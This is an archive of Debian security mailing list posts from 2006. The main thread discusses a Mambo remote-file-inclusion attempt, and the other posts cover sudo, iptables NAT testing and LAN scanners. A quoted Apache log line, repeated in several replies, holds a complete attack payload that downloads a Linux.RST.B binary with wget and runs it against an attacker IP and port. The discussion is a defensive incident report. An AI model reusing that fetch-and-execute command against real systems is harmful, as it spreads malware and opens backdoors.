Re: Strange Apache log and mambo security - sexy executable

2006-01-23 Thread Michael Loftis



--On January 23, 2006 8:31:40 AM +0100 Maik Holtkamp 
[EMAIL PROTECTED] wrote:



-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Hi,

yesterday morning I found a strange entry in my apache log files (debian
sarge, apache 1.3, mambo 4.5.3, kernel 2.4.31). It's a dyndns homelan
Server, just serving my Family and some good friends (normally).

- ---cut---
132.248.204.65 - - [19/Jan/2006:07:08:32 +0100] GET
/cvs/index2.php?_REQUEST[option]=com_content_REQUEST[Itemid]=1GLOBALS=
mosConfig_absolute_path=http://200.72.130.29/cmd.gif?cmd=cd%20/tmp;wget%
20212.20
3.97.120/sexy;chmod%20744%20sexy;./sexy%2071.137.131.26%208080;00;echo%20
YYY;echo|  HTTP/1.1 200 28 - Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1;) - ---cut---

As I patched mambo against recent register global attack and my /tmp
is mount noexec, the attack doesn't exploit anything.

However, I curiously downloaded this sexy executable to have a closer
look.

- ---cut---
backup:/home/qmb# ./sexy -h
./sexy host port
- ---cut---


Firstly, don't ever download and run untrusted code as root, especially 
when it's obviously an exploit attempt, unless you run it on an unconnected 
box you're prepared to scrap afterwards.  God knows what the code will do 
to your system.


This host backup (sarge, 2.6.12) is in the second raw of my LAN and just
used to make rsync backups of LAN hosts to usb hds.

Unfortunately, I was that curious, that I decided to strace it (in spite
I hardly understand strace):

- ---cut---
backup:/home/qmb# strace ./sexy
execve(./sexy, [./sexy], [/* 20 vars */]) = 0
uname({sys=Linux, node=backup, ...}) = 0
brk(0)  = 0x804a000
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS,
- -1, 0) = 0xb7f13000
access(/etc/ld.so.nohwcap, F_OK)  = -1 ENOENT (No such file or
directory)
open(/etc/ld.so.preload, O_RDONLY)= -1 ENOENT (No such file or
directory)
open(/etc/ld.so.cache, O_RDONLY)  = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=30780, ...}) = 0
old_mmap(NULL, 30780, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7f0b000
close(3)= 0
access(/etc/ld.so.nohwcap, F_OK)  = -1 ENOENT (No such file or
directory)
open(/lib/tls/libc.so.6, O_RDONLY)= 3
read(3, \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0`Z\1\000...,
512) = 512
fstat64(3, {st_mode=S_IFREG|0755, st_size=1254468, ...}) = 0
old_mmap(NULL, 1264780, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) =
0xb7dd6000 old_mmap(0xb7f0, 36864, PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_FIXED, 3, 0x129000) = 0xb7f0
old_mmap(0xb7f09000, 7308, PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f09000
close(3)= 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS,
- -1, 0) = 0xb7dd5000
set_thread_area({entry_number:-1 - 6, base_addr:0xb7dd5460,
limit:1048575, seg_32bit:1, contents:0, read_exec_only:0,
limit_in_pages:1, seg_not_present:0, useable:1}) = 0
munmap(0xb7f0b000, 30780)   = 0
fork()  = 11935
fstat64(1, {st_mode=S_IFCHR|0600, st_rdev=makedev(136, 0), ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1,
0) = 0xb7f12000
write(1, ./sexy host port\n, 21./sexy host port
)  = 21
munmap(0xb7f12000, 4096)= 0
exit_group(2)   = ?
- ---cut---

After this run the box was hardly damaged:

- - It insists on bringing its NIC to promiscuous mode
- - ls, grep, gunzip (probably others, too) just give a segmentation
  fault

I tried to investigate further:

- - tcpdump doesn't show any traffic in the net that shouldn't be there
- - ps ax listed only known processes, all where found in /proc, too
- - Top doesn't show anything strange
- - netstat -tulpen doesn't list any ports listening

Trying rebooting failed totally. It tried to run a lot of grep processes
that didn't run etc.

It took me 2 hours to return to a normal state with this box (booting
knoppix, backup of corrupted /var, blanking the disc, restoring the
backup of the night before).

In spite I am not that familiar with strace and no coder, I suppose that
the program sexy damaged the linker (open ld.so.cache) and would have
tried to open a ptty on the IP/port given on the command line (As I did
not give any command line arguments, this failed). Probably the guy/bot
on the other end would have exchanged some libs in this session to
install the real rootkit on the box.

Right?


Not having the binary and not really having time to look at it, it's 
probably just straight up attempting to infect your machine, and that it 
very clearly succeeded in doing.  It didn't however succeed in hiding 
itself, as evidenced by your segfaults.  You're probably running a litle 
different target OS than 'sexy' was built for.




Though I already invested some time (restoring the host backup), I would
be pleased to understand what happened more detailed so any clue is
appreciated.

If somebody wants to have 

Re: [SECURITY] [DSA 946-1] New sudo packages fix privilege escalation

2006-01-23 Thread Josselin Mouette
Le vendredi 20 janvier 2006 à 11:24 +0100, Martin Schulze a écrit :
 This update alters the former behaviour of sudo and limits the number
 of supported environment variables to LC_*, LANG, LANGUAGE and TERM.
 Additional variables are only passed through when set as env_check in
 /etc/sudoers, which might be required for some scripts to continue to
 work.

How about the XAUTHORITY environment variable ? Isn't it necessary to
run X11 applications?

Regards,
-- 
 .''`.   Josselin Mouette/\./\
: :' :   [EMAIL PROTECTED]
`. `'[EMAIL PROTECTED]
   `-  Debian GNU/Linux -- The power of freedom



Re: Strange Apache log and mambo security - sexy executable

2006-01-23 Thread Edward Shornock
On Mon, Jan 23, 2006 at 08:31:40AM +0100, Maik Holtkamp wrote:
 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA1
 
 Hi,
 
 yesterday morning I found a strange entry in my apache log files (debian
 sarge, apache 1.3, mambo 4.5.3, kernel 2.4.31). It's a dyndns homelan
 Server, just serving my Family and some good friends (normally).
 
 - ---cut---
 132.248.204.65 - - [19/Jan/2006:07:08:32 +0100] GET
 /cvs/index2.php?_REQUEST[option]=com_content_REQUEST[Itemid]=1GLOBALS=mosConfig_absolute_path=http://200.72.130.29/cmd.gif?cmd=cd%20/tmp;wget%20212.20
 3.97.120/sexy;chmod%20744%20sexy;./sexy%2071.137.131.26%208080;00;echo%20YYY;echo|
  HTTP/1.1 200 28 - Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
 - ---cut---
 
 As I patched mambo against recent register global attack and my /tmp
 is mount noexec, the attack doesn't exploit anything.
 
 However, I curiously downloaded this sexy executable to have a closer look.
 
 - ---cut---
 backup:/home/qmb# ./sexy -h
 ./sexy host port
 - ---cut---

Never run apps like this as root.  Bad bad idea.

If you want more information about this tool, google for Linux.RST.B
or Unix/RST.B.

cut---
$ f-prot sexy
Virus scanning report  -  23 January 2006 @ 4:21

F-PROT ANTIVIRUS
Program version: 4.6.5
Engine version: 3.16.13

VIRUS SIGNATURE FILES
SIGN.DEF created 13 January 2006
SIGN2.DEF created 13 January 2006
MACRO.DEF created 13 January 2006

Search: sexy
Action: Report only
Files: Dumb scan of all files
Switches: -ARCHIVE -PACKED -SERVER

/tmp/sexy  Infection: Unix/RST.B

Results of virus scanning:

Files: 1
MBRs: 0
Boot sectors: 0
Objects scanned: 1
Infected: 1
Suspicious: 0
Disinfected: 0
Deleted: 0
Renamed: 0

Time: 0:00
--end--


--cut--
$ clamscan sexy
sexy: Linux.RST.B FOUND

--- SCAN SUMMARY ---
Known viruses: 35671
Engine version: 0.88
Scanned directories: 0
Scanned files: 1
Infected files: 1
Data scanned: 0.01 MB
Time: 0.903 sec (0 m 0 s)
--end--



 
 This host backup (sarge, 2.6.12) is in the second raw of my LAN and just
 used to make rsync backups of LAN hosts to usb hds.
 
 Unfortunately, I was that curious, that I decided to strace it (in spite
 I hardly understand strace):
 
 - ---cut---
 backup:/home/qmb# strace ./sexy
 execve(./sexy, [./sexy], [/* 20 vars */]) = 0
 uname({sys=Linux, node=backup, ...}) = 0
 brk(0)  = 0x804a000
 old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS,
 - -1, 0) = 0xb7f13000
 access(/etc/ld.so.nohwcap, F_OK)  = -1 ENOENT (No such file or
 directory)
 open(/etc/ld.so.preload, O_RDONLY)= -1 ENOENT (No such file or
 directory)
 open(/etc/ld.so.cache, O_RDONLY)  = 3
 fstat64(3, {st_mode=S_IFREG|0644, st_size=30780, ...}) = 0
 old_mmap(NULL, 30780, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7f0b000
 close(3)= 0
 access(/etc/ld.so.nohwcap, F_OK)  = -1 ENOENT (No such file or
 directory)
 open(/lib/tls/libc.so.6, O_RDONLY)= 3
 read(3, \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0`Z\1\000...,
 512) = 512
 fstat64(3, {st_mode=S_IFREG|0755, st_size=1254468, ...}) = 0
 old_mmap(NULL, 1264780, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0xb7dd6000
 old_mmap(0xb7f0, 36864, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED,
 3, 0x129000) = 0xb7f0
 old_mmap(0xb7f09000, 7308, PROT_READ|PROT_WRITE,
 MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f09000
 close(3)= 0
 old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS,
 - -1, 0) = 0xb7dd5000
 set_thread_area({entry_number:-1 - 6, base_addr:0xb7dd5460,
 limit:1048575, seg_32bit:1, contents:0, read_exec_only:0,
 limit_in_pages:1, seg_not_present:0, useable:1}) = 0
 munmap(0xb7f0b000, 30780)   = 0
 fork()  = 11935
 fstat64(1, {st_mode=S_IFCHR|0600, st_rdev=makedev(136, 0), ...}) = 0
 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1,
 0) = 0xb7f12000
 write(1, ./sexy host port\n, 21./sexy host port
 )  = 21
 munmap(0xb7f12000, 4096)= 0
 exit_group(2)   = ?
 - ---cut---
 
 After this run the box was hardly damaged:
 
 - - It insists on bringing its NIC to promiscuous mode
 - - ls, grep, gunzip (probably others, too) just give a segmentation
   fault
 
 I tried to investigate further:
 
 - - tcpdump doesn't show any traffic in the net that shouldn't be there
 - - ps ax listed only known processes, all where found in /proc, too
 - - Top doesn't show anything strange
 - - netstat -tulpen doesn't list any ports listening
 
 Trying rebooting failed totally. It tried to run a lot of grep processes
 that didn't run etc.
 
 It took me 2 hours to return to a normal state with this box (booting
 knoppix, backup of corrupted /var, blanking the disc, restoring the
 backup of the night before).
 
 In spite I am not that familiar with strace and no coder, I suppose that
 the program sexy damaged the linker (open ld.so.cache) and would have
 tried 

Re: Strange Apache log and mambo security - sexy executable

2006-01-23 Thread Edward Shornock
Oops...didn't trim enough of the response and curiosity made me research
this.

According to the sophos site:

--cut--
Linux/Rst-B will attempt to infect all ELF executables in the current
working directory and the directory /bin

If Linux/Rst-B is executed by a privileged user then it may attempt to
create a backdoor on the system. This is achieved by opening a socket
and listening for a particular packet containing details about the
origin of the attacker and the command the attacker would like to
execute on the system.

--end--



I'd reinstall since you ran this executable on your system as root.  Who
knows what the full extent of the damaged caused is...


signature.asc
Description: Digital signature


Re: Strange Apache log and mambo security - sexy executable

2006-01-23 Thread Maik Holtkamp
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Edward Shornock schrieb:
  On Mon, Jan 23, 2006 at 08:31:40AM +0100, Maik Holtkamp wrote:
  Hi,
  
  yesterday morning I found a strange entry in my apache log files (debian
  sarge, apache 1.3, mambo 4.5.3, kernel 2.4.31). It's a dyndns homelan
  Server, just serving my Family and some good friends (normally).
  
  ---cut---
  132.248.204.65 - - [19/Jan/2006:07:08:32 +0100] GET
  /cvs/index2.php?_REQUEST[option]=com_content_REQUEST[Itemid]=1GLOBALS=mosConfig_absolute_path=http://200.72.130.29/cmd.gif?cmd=cd%20/tmp;wget%20212.20
  3.97.120/sexy;chmod%20744%20sexy;./sexy%2071.137.131.26%208080;00;echo%20YYY;echo|
   HTTP/1.1 200 28 - Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
  ---cut---
  
  As I patched mambo against recent register global attack and my /tmp
  is mount noexec, the attack doesn't exploit anything.
  
  However, I curiously downloaded this sexy executable to have a closer look.
  
  ---cut---
  backup:/home/qmb# ./sexy -h
  ./sexy host port
  ---cut---
  
 Never run apps like this as root.  Bad bad idea.

There is an old saying in Germany:

Only damage will make you wise

In spite the box where I tried was on the second line and I did not pass
any arguments (IP/port) to the tool, I see the chance that it would have
polluted the whole LAN and probably even find a way to the outside, now.

Thanks god it wasn't that evil, so the knoppix restore could fix the
situation.

 If you want more information about this tool, google for Linux.RST.B
 or Unix/RST.B.

Thank you very much.

- --
- - maik
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.4 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFD1LDZz3bq6aadmI8RAj/fAJ93fsZEUSRiPNRGUqs7Q7t6pDOF8wCeK1Tn
LzAJkhxI+Kfs5njhvwZ/Xio=
=3tRt
-END PGP SIGNATURE-


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Re: Security implications of allowing init to re-exec from another path

2006-01-23 Thread Thomas Hood
For the record, we didn't add this feature.  The person who requested it
found that he could bind-mount a different executable over /sbin/init
instead.

-- 
Thomas Hood


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Simple symmetric NAT Setup using IPTABLES

2006-01-23 Thread Asif
Hello every one. I am having problem in setting up symmetric NAT using
IPTABLES

Actually I am working on SIP application. SIP has the problem on NATes
networks. STUN is one of the solutions. I have embedded STUN client
functionality inside SIP application. Now i have to test the
application. There are four scenerios of NATed network:

   The following chart shows combinations of NATs at each endpoint with
   the current NAT type definitions in STUN. The combinations are
   classified into 4 groups: Class I, II, III and IV.

  +--+-+-+-+-+-+
  |\ EP-R| | | | | |
  |  |Open |  F  |  P  | PR  | SYM |
  |EP-S \| | | | | |
  |--+-+-+-+-+-+
  | Open | | | |
  |--+ | | |
  | F| | |(III)|
  |--+( I )| ( II )  | |
  | P| | | |
  |--+ | +-+
  | PR   | | | |
  |--+ |   +-+ |
  | SYM  | |   |  (IV) |
  +--+-+---+
  Note:
   EP-S: Sending endpoint.
   EP-R: Receiving endpoint.
(In full-duplex, both EP-a and EP-b in Figure 3.1
 will have both EP-S and EP-R)
   Open: Open to public network (no NAT)
   F   : Full-cone NAT
   R   : Restricted-cone NAT
   PR  : Port restricted-cone NAT

For setting up a test environment, I decided to setup as below:



 192.168.0.2
+--+
| ClientA  |
+--+
|
|
|  eth1 eth0
| 192.168.0.1 | 172.25.25.41
+-|-+
|   NAT1|
+-|-+
|
|
|
172.25.25.42|
+---+
|Proxy\Registrar,STUN Server|
+---+
|
|
  eth1eth0  |
   10.0.0.1   |172.25.25.43 |
+-|-+
|   NAT2|
+-|-+
|
|
|
| 10.0.0.2
+--+
| ClientB  |
+--+



 172.25.25.X  LAN (External Network for client A and B)
 192.168.0.X  Private Network 1 (Internal Network for Client A)
 10.0.0.X Private Network 2 (Internal Network for Client B)

 ClientA and ClientB are sip clients with STUN functionality embedded.

 NAT1 and NAT2 are internal LAN NAT. I mean for testing purpose, i have
used two machines with two network cards.


below is the configuration of NAT1 using iptables. Also I am
configuring it for UDP protocol as SIP application is using UDP for
both signaling and media streaming.

 iptables -A PREROUTING -t nat -d 172.25.25.41 -i eth0 -j DNAT --to 192.168.0.2
  This tells NAT1 to change the destination of the packet recieved on
eth0 to clientA address whenever the destination is eth0 (172.25.25.41)

 iptables -A FORWARD -d 192.168.0.2 -j ACCEPT
 iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
  For forwarding the packets from eth1 and to remember its state

 iptables -A POSTROUTING -t nat -p udp -s 192.168.0.2 -o eth0 -j SNAT --to 
 172.25.25.41:7070-7074
  to change the source address of the packet to a pool of address
before routing to eth0. My intention was to make it symmetric.

 echo 1  /proc/sys/net/ipv4/ip_forward
  to set the ip_forward table ON



  The above commands  I used for making NAT1 symmetric, For making it
port restricted, I change the POSTROUTING command above and make it
like this:
 iptables -A POSTROUTING -t nat -p udp -s 192.168.0.2 -o eth0 -j SNAT --to 
 172.25.25.41:8080
  Here NAT1 will change the source address of ClientA packets to same
address for routing. I am using it for testing purpose so it will work
as long as only one client exists in Private Network 1.


  For making NAT1 restricted, I change the above POSTROUTING command
and make it like this:
 iptables -A POSTROUTING -t nat -p udp -s 192.168.0.2 -o eth0 -j SNAT --to 
 172.25.25.41


  For making it FULL CONE NAT, i have to think about it.


  So what I want is a test environment for my SIP application. I can't
use application Gateway, as only NAT will work here because after
testing here, i will try to test it on some real environment. I wants
IPTABLE commands that can do the above task. Please suggest some thing
if you have some better option in your mind. Like If there is some
application that can setup NAT as mentioned above or if I can test my
application on some public STUN and proxy servers on the Internet.
ALso, if you think this can be performed by some utility on some
different OS like Windows, pleass suggest me.
  
  
  regards,
  
  Asif


-- 
To 

Re: Strange Apache log and mambo security - sexy executable

2006-01-23 Thread Jose Marrero
Just a couple of things:

Apache configured with mod_rewrite to deny blank or fake referers is a
good idea.

Do you have apache configured with mod_security?  I highly recommend this
last one since you run an php based CMS and can protect from exploits not
yet discovered.


On Mon, January 23, 2006 2:32 am, Maik Holtkamp said:
 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA1

 Edward Shornock schrieb:
  On Mon, Jan 23, 2006 at 08:31:40AM +0100, Maik Holtkamp wrote:
  Hi,
 
  yesterday morning I found a strange entry in my apache log files
 (debian
  sarge, apache 1.3, mambo 4.5.3, kernel 2.4.31). It's a dyndns homelan
  Server, just serving my Family and some good friends (normally).
 
  ---cut---
  132.248.204.65 - - [19/Jan/2006:07:08:32 +0100] GET
  /cvs/index2.php?_REQUEST[option]=com_content_REQUEST[Itemid]=1GLOBALS=mosConfig_absolute_path=http://200.72.130.29/cmd.gif?cmd=cd%20/tmp;wget%20212.20
  3.97.120/sexy;chmod%20744%20sexy;./sexy%2071.137.131.26%208080;00;echo%20YYY;echo|
   HTTP/1.1 200 28 - Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
 5.1;)
  ---cut---
 
  As I patched mambo against recent register global attack and my /tmp
  is mount noexec, the attack doesn't exploit anything.
 
  However, I curiously downloaded this sexy executable to have a closer
 look.
 
  ---cut---
  backup:/home/qmb# ./sexy -h
  ./sexy host port
  ---cut---
 
 Never run apps like this as root.  Bad bad idea.

 There is an old saying in Germany:

 Only damage will make you wise

Funny, Don Quixote (when in a good mood) used to say, Sancho, why
experience always comes when is not needed?*

*I am just paraphrasing...




-- 
-JM. “Estos días azules y este sol de la infancia “(Antonio Machado-1939)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Re: Strange Apache log and mambo security - sexy executable

2006-01-23 Thread Christoph Ulrich Scholler
Hi,

On 23.01. 07:46, Jose Marrero wrote:
 Apache configured with mod_rewrite to deny blank or fake referers is a
 good idea.

How can you tell that a referrer is fake?

Regards,

uLI


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Re: Strange Apache log and mambo security - sexy executable

2006-01-23 Thread Jose Marrero
Life is only probabilities...isn't it?

A quick link for an overview:

http://en.wikipedia.org/wiki/Referer_spam

There are blacklists elsewhere, some updated every 15 minutes.


On Mon, January 23, 2006 8:58 am, Christoph Ulrich Scholler said:
 Hi,

 On 23.01. 07:46, Jose Marrero wrote:
 Apache configured with mod_rewrite to deny blank or fake referers is a
 good idea.

 How can you tell that a referrer is fake?

 Regards,

 uLI


 --
 To UNSUBSCRIBE, email to [EMAIL PROTECTED]
 with a subject of unsubscribe. Trouble? Contact
 [EMAIL PROTECTED]



-- 
-JM. “Estos días azules y este sol de la infancia “(Antonio Machado-1939)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Security scanner

2006-01-23 Thread Jaroslaw Tabor
Hi all!

Has anyone know a network scanner I can run on Debian to search LAN for
unprotected windows shares ? Or maybe something looking for simple
passwords ? I'd like to automate discovering stupid users, leaving full
access to their C:\.

-- 
Jaroslaw Tabor [EMAIL PROTECTED]


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Re: Security scanner

2006-01-23 Thread Danny De Cock
On Tue, 24 Jan 2006, Jaroslaw Tabor wrote:

 Hi all!

   Has anyone know a network scanner I can run on Debian to search

you can use the debian package gnomba to easily browse through all the
windows shares that are available on your local network...  very
straightforward to use!

kind regards, danny.

 LAN for unprotected windows shares ? Or maybe something looking for
 simple passwords ? I'd like to automate discovering stupid users,
 leaving full access to their C:\.

-
A pessimist is a decently informed optimist.
-
mail: decockd:at:esat:dot:kuleuven:dot:be http://godot.be
  godot:at:advalvas:dot:be  http://godot.studentenweb.org
  godot:at:godot:dot:be web: http://www.esat.kuleuven.be/~decockd


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Re: Security scanner

2006-01-23 Thread Daniel Givens
On 1/23/06, Jaroslaw Tabor [EMAIL PROTECTED] wrote:
 Hi all!

 Has anyone know a network scanner I can run on Debian to search LAN 
 for
 unprotected windows shares ?

Look into Nessus. (http://www.nessus.org/)

 Or maybe something looking for simple
 passwords ?

Look into John the Ripper (http://www.openwall.com/john/)


 I'd like to automate discovering stupid users, leaving full
 access to their C:\.

...I still wouldn't let them have full access to the root drive.
Leaves for too many openings for malware (ad/spyware, viruses, worms)
to go crazy on your systems. Stupid users are assumed, stupid admins
are another thing all together.

~Daniel